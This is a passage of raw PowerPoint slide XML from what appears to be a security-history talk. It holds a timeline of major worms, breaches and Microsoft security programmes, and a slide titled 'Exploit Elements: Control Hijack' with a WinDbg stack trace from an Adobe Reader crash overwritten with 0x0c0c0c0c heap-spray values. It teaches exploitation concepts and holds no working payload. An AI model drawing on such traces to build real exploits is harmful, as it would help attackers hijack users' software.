            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="91440" rIns="91440" bIns="91440"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Blaster</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="2917">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="30000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>   .. Nimda</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="2917">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="30000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>     .. SQL Slammer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Arrow: Right 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BB49639-F2FA-44F1-B845-726B08E6C9E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5769208" y="1868579"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5665490-3406-41DF-A95E-40B158EE42CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3102208" y="1535323"/>
            <a:ext cx="2514600" cy="1736646"/>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Joined Microsoft in 2000. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="2917">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="30000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>BillG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="2917">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="30000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t> writes the Trustworthy Computing Memo in 2002</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBB34EE6-7D08-44AA-9CE7-EBADDAE5F94B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7514014" y="3188537"/>
            <a:ext cx="2906336" cy="1736646"/>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The Security Development Lifecycle and meeting researchers around the world</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A45231F-EC2F-4ED8-B1E7-A57D6298FBA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10172466" y="1339525"/>
            <a:ext cx="1981200" cy="1515308"/>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Windows Standdown and </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="2917">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="30000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>XP SP2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Arrow: Right 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC4521FA-8BEA-46B8-A9C3-B0BC9AC60D4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9319301" y="1868579"/>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Arrow: Bent 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94CF4F48-A432-4E01-822D-6C0AD0E668B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="10603083" y="3188537"/>
            <a:ext cx="1221566" cy="1123712"/>
          </a:xfrm>
          <a:prstGeom prst="bentArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 19509"/>
              <a:gd name="adj2" fmla="val 25000"/>
              <a:gd name="adj3" fmla="val 25000"/>
              <a:gd name="adj4" fmla="val 43750"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17B37C4B-6562-419A-8DEF-E636F7F7E83C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="6709391" y="3828260"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{992CBBBF-9F34-4586-B9A7-CDAB241B61C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2631469" y="4842656"/>
            <a:ext cx="2731106" cy="2077164"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="91440" rIns="91440" bIns="91440" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="2917">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="30000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>WannaCry, NotPetya</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="2917">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="30000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>  .. Ransomware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="2917">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="30000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>    .. SolarWinds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="2917">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="30000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>     .. Exchange 0-day</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="2917">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="30000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>      .. Ukraine War</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Arrow: Right 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D288092-A5F6-44CD-97C4-A493BF4AAFE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="3249770" y="3828260"/>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Arrow: Bent 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{108E6338-7B80-404C-96C1-9CF1F963AF1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="1405027" y="5319382"/>
            <a:ext cx="1221566" cy="1123712"/>
          </a:xfrm>
          <a:prstGeom prst="bentArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 19509"/>
              <a:gd name="adj2" fmla="val 25000"/>
              <a:gd name="adj3" fmla="val 25000"/>
              <a:gd name="adj4" fmla="val 43750"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1C9BD38-CEA5-4C56-8111-2E4DCF4B7D2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="470766" y="3341771"/>
            <a:ext cx="2479041" cy="1430179"/>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O365 and the Microsoft Threat Intelligence Center (MSTIC)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Arrow: Right 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA9FEAB9-CED8-47D4-BDE9-B7F64B0DA998}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8707287" y="5652638"/>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Box 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C1BC906-2660-4EF7-A9E1-DA7B3D04E38A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6094709" y="5472616"/>
            <a:ext cx="2514600" cy="817245"/>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Microsoft Security Research</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Arrow: Right 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08FAAD83-8D89-80CC-3113-14CEC94A9282}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5397087" y="5652638"/>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Box 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DE2620F-40FE-3C26-A05E-5EA3AE884A61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9491065" y="5234253"/>
            <a:ext cx="2561909" cy="1293971"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="91440" rIns="91440" bIns="91440"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LAPSUS$</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="2917">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="30000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>.. Volt Typhoon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="2917">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="30000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>   .. Storm-0558</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EE3C269-2521-5C08-BDE5-ADEF1743D4A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4128460" y="3452439"/>
            <a:ext cx="2117851" cy="1208842"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="60000"/>
              <a:lumOff val="40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MS08-067</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Stuxnet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="2917">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="30000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>     .. MS Flame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1631872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4" grpId="0" animBg="1"/>
      <p:bldP spid="15" grpId="0" animBg="1"/>
      <p:bldP spid="16" grpId="0" animBg="1"/>
      <p:bldP spid="18" grpId="0" animBg="1"/>
      <p:bldP spid="19" grpId="0" animBg="1"/>
      <p:bldP spid="20" grpId="0" animBg="1"/>
      <p:bldP spid="21" grpId="0" animBg="1"/>
      <p:bldP spid="24" grpId="0" animBg="1"/>
      <p:bldP spid="25" grpId="0" animBg="1"/>
      <p:bldP spid="26" grpId="0" animBg="1"/>
      <p:bldP spid="2" grpId="0" animBg="1"/>
      <p:bldP spid="3"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492443"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit Elements: Control Hijack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1788371" y="1321188"/>
            <a:ext cx="8937449" cy="5472909"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1428" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>E:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1428" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0:000&gt; kb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1428" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ChildEBP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1428" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1428" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RetAddr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1428" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1428" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1428" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> to Child</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1428" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0012b3c0 77c69244 77a2c3e4 00000002 0012b414 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1428" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ntdll!KiFastSystemCallRet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1428" dirty="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1428" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0012b3c4 77a2c3e4 00000002 0012b414 00000001 ntdll!ZwWaitForMultipleObjects+0xc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1428" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0012b460 77a2c64e 0012b414 0012b4b0 00000000 kernel32!WaitForMultipleObjectsEx+0x11d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1428" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0012b47c 77a9db5d 00000002 0012b4b0 00000000 kernel32!WaitForMultipleObjects+0x18</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1428" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0012b4e8 77a9dd89 0219bf90 00000001 00000001 kernel32!WerpReportFaultInternal+0x16d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1428" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0012b4fc 77a7f54d 0219bf90 00000001 fffecf74 kernel32!WerpReportFault+0x70</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1428" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0012b588 01fa6a4d 00000000 f03da35c 0fc25ca3 kernel32!UnhandledExceptionFilter+0x1b5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1428" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WARNING: Stack unwind information not available. Following frames may be wrong.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1428" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0012b8bc 01d52c7d 04912970 00000000 049321a0 AcroRd32_1ac0000+0x4e6a4d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1428" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0012b944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AcroRd32_1ac0000+0x292c7d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1428" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0012b948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0012b94c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0012b950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0012b954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0012b958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0012b95c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0012b960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0012b964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0012b968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0012b96c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a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1428" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0012b970 0c0c0c0c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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1428" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0c0c0c0c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1428" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 0xc0c0c0c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rounded Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1710654" y="3885847"/>
            <a:ext cx="5906488" cy="2953244"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:glow rad="635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36"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5208478" y="4818451"/>
            <a:ext cx="6343874" cy="941647"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="non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507"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Stack Overrun CVE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="852766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21522" y="280105"/>
            <a:ext cx="8393430" cy="1165754"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="4488" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
